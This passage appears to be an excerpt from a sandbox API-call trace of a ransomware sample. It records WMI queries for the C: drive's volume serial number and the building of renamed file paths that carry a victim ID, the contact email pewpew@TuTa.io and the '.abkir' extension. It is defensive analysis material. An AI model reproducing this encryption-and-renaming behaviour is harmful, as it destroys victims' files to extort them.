ppvObject=0x949e774*=0x6030b70) returned 0x0 [0214.356] WbemDefPath:IUnknown:AddRef (This=0x6030b70) returned 0x3 [0214.356] WbemDefPath:IUnknown:Release (This=0x6030b70) returned 0x2 [0214.356] WbemDefPath:IWbemPath:SetText (This=0x6030b70, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0214.356] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b70, puCount=0x949e8fc | out: puCount=0x949e8fc*=0x0) returned 0x0 [0214.356] WbemDefPath:IWbemPath:GetText (in: This=0x6030b70, lFlags=2, puBuffLength=0x949e8f8*=0x0, pszText=0x0 | out: puBuffLength=0x949e8f8*=0x20, pszText=0x0) returned 0x0 [0214.356] WbemDefPath:IWbemPath:GetText (in: This=0x6030b70, lFlags=2, puBuffLength=0x949e8f8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949e8f8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0214.356] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030b70, uRequestedInfo=0x0, puResponse=0x949e904 | out: puResponse=0x949e904*=0xc19) returned 0x0 [0214.357] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b70, puCount=0x949e8fc | out: puCount=0x949e8fc*=0x0) returned 0x0 [0214.357] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030b70, uRequestedInfo=0x0, puResponse=0x949e904 | out: puResponse=0x949e904*=0xc19) returned 0x0 [0214.357] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030b70, uRequestedInfo=0x0, puResponse=0x949e904 | out: puResponse=0x949e904*=0xc19) returned 0x0 [0214.357] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b70, puCount=0x949e87c | out: puCount=0x949e87c*=0x0) returned 0x0 [0214.357] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x949e868 | out: puCount=0x949e868*=0x2) returned 0x0 [0214.357] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e864*=0x0, pszText=0x0 | out: puBuffLength=0x949e864*=0xf, pszText=0x0) returned 0x0 [0214.357] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e864*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e864*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.357] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e818 | out: ppv=0x949e818*=0xb51e34) returned 0x0 [0214.357] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e810 | out: pAptType=0x949e810*=1) returned 0x0 [0214.357] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e814 | out: ppvObject=0x949e814*=0x0) returned 0x80004002 [0214.357] IUnknown:Release (This=0xb51e34) returned 0x1 [0214.358] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e180 | out: ppv=0x949e180*=0x60272b0) returned 0x0 [0214.358] WbemDefPath:IUnknown:QueryInterface (in: This=0x60272b0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e398 | out: ppvObject=0x949e398*=0x0) returned 0x80004002 [0214.358] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60272b0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e3ac | out: ppvObject=0x949e3ac*=0x60308d0) returned 0x0 [0214.358] WbemDefPath:IUnknown:Release (This=0x60272b0) returned 0x0 [0214.358] WbemDefPath:IUnknown:QueryInterface (in: This=0x60308d0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dfcc | out: ppvObject=0x949dfcc*=0x60308d0) returned 0x0 [0214.358] WbemDefPath:IUnknown:QueryInterface (in: This=0x60308d0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949df88 | out: ppvObject=0x949df88*=0x0) returned 0x80004002 [0214.358] WbemDefPath:IUnknown:AddRef (This=0x60308d0) returned 0x3 [0214.358] WbemDefPath:IUnknown:QueryInterface (in: This=0x60308d0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949d8e4 | out: ppvObject=0x949d8e4*=0x0) returned 0x80004002 [0214.358] WbemDefPath:IUnknown:QueryInterface (in: This=0x60308d0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949d894 | out: ppvObject=0x949d894*=0x0) returned 0x80004002 [0214.358] WbemDefPath:IUnknown:QueryInterface (in: This=0x60308d0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949d8a0 | out: ppvObject=0x949d8a0*=0xbdf030) returned 0x0 [0214.358] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbdf030, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949d8a8 | out: pCid=0x949d8a8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.358] WbemDefPath:IUnknown:Release (This=0xbdf030) returned 0x3 [0214.358] CoGetContextToken (in: pToken=0x949d900 | out: pToken=0x949d900) returned 0x0 [0214.358] CoGetContextToken (in: pToken=0x949dd08 | out: pToken=0x949dd08) returned 0x0 [0214.358] WbemDefPath:IUnknown:QueryInterface (in: This=0x60308d0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dd98 | out: ppvObject=0x949dd98*=0x0) returned 0x80004002 [0214.358] WbemDefPath:IUnknown:Release (This=0x60308d0) returned 0x2 [0214.358] WbemDefPath:IUnknown:Release (This=0x60308d0) returned 0x1 [0214.358] CoGetContextToken (in: pToken=0x949e690 | out: pToken=0x949e690) returned 0x0 [0214.358] CoGetContextToken (in: pToken=0x949e5f0 | out: pToken=0x949e5f0) returned 0x0 [0214.358] WbemDefPath:IUnknown:QueryInterface (in: This=0x60308d0, riid=0x949e6c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e6bc | out: ppvObject=0x949e6bc*=0x60308d0) returned 0x0 [0214.359] WbemDefPath:IUnknown:AddRef (This=0x60308d0) returned 0x3 [0214.359] WbemDefPath:IUnknown:Release (This=0x60308d0) returned 0x2 [0214.359] WbemDefPath:IWbemPath:SetText (This=0x60308d0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0214.359] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60308d0, puCount=0x949e840 | out: puCount=0x949e840*=0x2) returned 0x0 [0214.359] WbemDefPath:IWbemPath:GetText (in: This=0x60308d0, lFlags=4, puBuffLength=0x949e83c*=0x0, pszText=0x0 | out: puBuffLength=0x949e83c*=0xf, pszText=0x0) returned 0x0 [0214.359] WbemDefPath:IWbemPath:GetText (in: This=0x60308d0, lFlags=4, puBuffLength=0x949e83c*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e83c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.359] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e840 | out: ppv=0x949e840*=0xb51e34) returned 0x0 [0214.359] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e838 | out: pAptType=0x949e838*=1) returned 0x0 [0214.359] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e83c | out: ppvObject=0x949e83c*=0x0) returned 0x80004002 [0214.359] IUnknown:Release (This=0xb51e34) returned 0x1 [0214.359] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e460 | out: ppv=0x949e460*=0x601f6c0) returned 0x0 [0214.359] WbemLocator:IUnknown:QueryInterface (in: This=0x601f6c0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e678 | out: ppvObject=0x949e678*=0x0) returned 0x80004002 [0214.360] WbemLocator:IClassFactory:CreateInstance (in: This=0x601f6c0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e68c | out: ppvObject=0x949e68c*=0x6027250) returned 0x0 [0214.360] WbemLocator:IUnknown:Release (This=0x601f6c0) returned 0x0 [0214.360] WbemLocator:IUnknown:QueryInterface (in: This=0x6027250, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e2ac | out: ppvObject=0x949e2ac*=0x6027250) returned 0x0 [0214.360] WbemLocator:IUnknown:QueryInterface (in: This=0x6027250, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e268 | out: ppvObject=0x949e268*=0x0) returned 0x80004002 [0214.360] WbemLocator:IUnknown:AddRef (This=0x6027250) returned 0x3 [0214.360] WbemLocator:IUnknown:QueryInterface (in: This=0x6027250, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dbc4 | out: ppvObject=0x949dbc4*=0x0) returned 0x80004002 [0214.360] WbemLocator:IUnknown:QueryInterface (in: This=0x6027250, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949db74 | out: ppvObject=0x949db74*=0x0) returned 0x80004002 [0214.360] WbemLocator:IUnknown:QueryInterface (in: This=0x6027250, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949db80 | out: ppvObject=0x949db80*=0x0) returned 0x80004002 [0214.360] CoGetContextToken (in: pToken=0x949dbe0 | out: pToken=0x949dbe0) returned 0x0 [0214.360] CoGetContextToken (in: pToken=0x949dfe8 | out: pToken=0x949dfe8) returned 0x0 [0214.360] WbemLocator:IUnknown:QueryInterface (in: This=0x6027250, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e078 | out: ppvObject=0x949e078*=0x0) returned 0x80004002 [0214.360] WbemLocator:IUnknown:Release (This=0x6027250) returned 0x2 [0214.360] WbemLocator:IUnknown:Release (This=0x6027250) returned 0x1 [0214.360] CoGetContextToken (in: pToken=0x949e658 | out: pToken=0x949e658) returned 0x0 [0214.360] CoGetContextToken (in: pToken=0x949e5b8 | out: pToken=0x949e5b8) returned 0x0 [0214.360] WbemLocator:IUnknown:QueryInterface (in: This=0x6027250, riid=0x949e688*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x949e684 | out: ppvObject=0x949e684*=0x6027250) returned 0x0 [0214.360] WbemLocator:IUnknown:AddRef (This=0x6027250) returned 0x3 [0214.360] WbemLocator:IUnknown:Release (This=0x6027250) returned 0x2 [0214.360] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60308d0, puCount=0x949e81c | out: puCount=0x949e81c*=0x2) returned 0x0 [0214.360] WbemDefPath:IWbemPath:GetText (in: This=0x60308d0, lFlags=8, puBuffLength=0x949e818*=0x0, pszText=0x0 | out: puBuffLength=0x949e818*=0xf, pszText=0x0) returned 0x0 [0214.360] WbemDefPath:IWbemPath:GetText (in: This=0x60308d0, lFlags=8, puBuffLength=0x949e818*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e818*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.360] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x949e6f4 | out: ppv=0x949e6f4*=0x60272d0) returned 0x0 [0214.360] WbemLocator:IWbemLocator:ConnectServer (in: This=0x60272d0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x949e788 | out: ppNamespace=0x949e788*=0x60331bc) returned 0x0 [0214.924] WbemLocator:IUnknown:QueryInterface (in: This=0x60331bc, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e624 | out: ppvObject=0x949e624*=0xb5a9b4) returned 0x0 [0214.924] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5a9b4, pProxy=0x60331bc, pAuthnSvc=0x949e674, pAuthzSvc=0x949e670, pServerPrincName=0x949e668, pAuthnLevel=0x949e66c, pImpLevel=0x949e65c, pAuthInfo=0x949e660, pCapabilites=0x949e664 | out: pAuthnSvc=0x949e674*=0xa, pAuthzSvc=0x949e670*=0x0, pServerPrincName=0x949e668, pAuthnLevel=0x949e66c*=0x6, pImpLevel=0x949e65c*=0x2, pAuthInfo=0x949e660, pCapabilites=0x949e664*=0x1) returned 0x0 [0214.924] WbemLocator:IUnknown:Release (This=0xb5a9b4) returned 0x1 [0214.924] WbemLocator:IUnknown:QueryInterface (in: This=0x60331bc, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e618 | out: ppvObject=0x949e618*=0xb5a9d4) returned 0x0 [0214.924] WbemLocator:IUnknown:QueryInterface (in: This=0x60331bc, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e614 | out: ppvObject=0x949e614*=0xb5a9b4) returned 0x0 [0214.924] WbemLocator:IClientSecurity:SetBlanket (This=0xb5a9b4, pProxy=0x60331bc, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0214.924] WbemLocator:IUnknown:Release (This=0xb5a9b4) returned 0x2 [0214.925] WbemLocator:IUnknown:Release (This=0xb5a9d4) returned 0x1 [0214.925] CoTaskMemFree (pv=0xbd4a68) [0214.925] WbemLocator:IUnknown:Release (This=0x60272d0) returned 0x0 [0215.080] WbemLocator:IUnknown:QueryInterface (in: This=0x60331bc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e214 | out: ppvObject=0x949e214*=0xb5a9d4) returned 0x0 [0215.080] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e1d0 | out: ppvObject=0x949e1d0*=0x0) returned 0x80004002 [0215.355] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949dfec | out: ppvObject=0x949dfec*=0x0) returned 0x80004002 [0215.356] WbemLocator:IUnknown:AddRef (This=0xb5a9d4) returned 0x3 [0215.356] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949db2c | out: ppvObject=0x949db2c*=0x0) returned 0x80004002 [0215.376] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949dadc | out: ppvObject=0x949dadc*=0x0) returned 0x80004002 [0215.377] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dae8 | out: ppvObject=0x949dae8*=0xb5a934) returned 0x0 [0215.377] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5a934, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949daf0 | out: pCid=0x949daf0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0215.377] WbemLocator:IUnknown:Release (This=0xb5a934) returned 0x3 [0215.377] CoGetContextToken (in: pToken=0x949db48 | out: pToken=0x949db48) returned 0x0 [0215.377] CoGetContextToken (in: pToken=0x949df50 | out: pToken=0x949df50) returned 0x0 [0215.377] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dfe0 | out: ppvObject=0x949dfe0*=0xb5a9bc) returned 0x0 [0215.377] WbemLocator:IRpcOptions:Query (in: This=0xb5a9bc, pPrx=0xb5a9d4, dwProperty=2, pdwValue=0x949e008 | out: pdwValue=0x949e008) returned 0x80004002 [0215.377] WbemLocator:IUnknown:Release (This=0xb5a9bc) returned 0x3 [0215.378] WbemLocator:IUnknown:Release (This=0xb5a9d4) returned 0x2 [0215.378] CoGetContextToken (in: pToken=0x949e528 | out: pToken=0x949e528) returned 0x0 [0215.378] CoGetContextToken (in: pToken=0x949e488 | out: pToken=0x949e488) returned 0x0 [0215.378] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x949e558*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x949e554 | out: ppvObject=0x949e554*=0x60331bc) returned 0x0 [0215.378] WbemLocator:IUnknown:AddRef (This=0x60331bc) returned 0x4 [0215.378] WbemLocator:IUnknown:Release (This=0x60331bc) returned 0x3 [0215.378] WbemLocator:IUnknown:Release (This=0x60331bc) returned 0x2 [0215.378] SysStringLen (param_1=0x0) returned 0x0 [0215.378] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b70, puCount=0x949e8ec | out: puCount=0x949e8ec*=0x0) returned 0x0 [0215.378] WbemDefPath:IWbemPath:GetText (in: This=0x6030b70, lFlags=2, puBuffLength=0x949e8e8*=0x0, pszText=0x0 | out: puBuffLength=0x949e8e8*=0x20, pszText=0x0) returned 0x0 [0215.378] WbemDefPath:IWbemPath:GetText (in: This=0x6030b70, lFlags=2, puBuffLength=0x949e8e8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949e8e8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0215.378] CoGetContextToken (in: pToken=0x949e558 | out: pToken=0x949e558) returned 0x0 [0215.378] WbemLocator:IUnknown:AddRef (This=0xb5a9d4) returned 0x3 [0215.378] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e3ec | out: ppvObject=0x949e3ec*=0xb5a9d4) returned 0x0 [0215.378] WbemLocator:IUnknown:Release (This=0xb5a9d4) returned 0x3 [0215.378] WbemLocator:IUnknown:Release (This=0xb5a9d4) returned 0x2 [0215.378] WbemDefPath:IWbemPath:GetText (in: This=0x6030b70, lFlags=2, puBuffLength=0x949e8f0*=0x0, pszText=0x0 | out: puBuffLength=0x949e8f0*=0x20, pszText=0x0) returned 0x0 [0215.378] WbemDefPath:IWbemPath:GetText (in: This=0x6030b70, lFlags=2, puBuffLength=0x949e8f0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949e8f0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0215.379] IWbemServices:GetObject (in: This=0x60331bc, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x949e8a4*=0x0, ppCallResult=0x0 | out: ppObject=0x949e8a4*=0x6028b10, ppCallResult=0x0) returned 0x0 [0215.401] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60308d0, puCount=0x949e8a4 | out: puCount=0x949e8a4*=0x2) returned 0x0 [0215.401] WbemDefPath:IWbemPath:GetText (in: This=0x60308d0, lFlags=4, puBuffLength=0x949e8a0*=0x0, pszText=0x0 | out: puBuffLength=0x949e8a0*=0xf, pszText=0x0) returned 0x0 [0215.401] WbemDefPath:IWbemPath:GetText (in: This=0x60308d0, lFlags=4, puBuffLength=0x949e8a0*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e8a0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0215.401] IWbemClassObject:Get (in: This=0x6028b10, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949e8a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36b64f4*=0, plFlavor=0x36b64f8*=0 | out: pVal=0x949e8a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36b64f4*=8, plFlavor=0x36b64f8*=0) returned 0x0 [0215.401] SysStringByteLen (bstr="9C354B42") returned 0x10 [0215.401] SysStringByteLen (bstr="9C354B42") returned 0x10 [0215.401] IWbemClassObject:Get (in: This=0x6028b10, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949e8a8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36b64f4*=8, plFlavor=0x36b64f8*=0 | out: pVal=0x949e8a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36b64f4*=8, plFlavor=0x36b64f8*=0) returned 0x0 [0215.401] SysStringByteLen (bstr="9C354B42") returned 0x10 [0215.401] SysStringByteLen (bstr="9C354B42") returned 0x10 [0215.401] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json", nBufferLength=0x105, lpBuffer=0x949e4a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json", lpFilePart=0x0) returned 0x97 [0215.401] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x949e4a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0xba [0215.401] SetThreadErrorMode (dwNewMode=0x1, 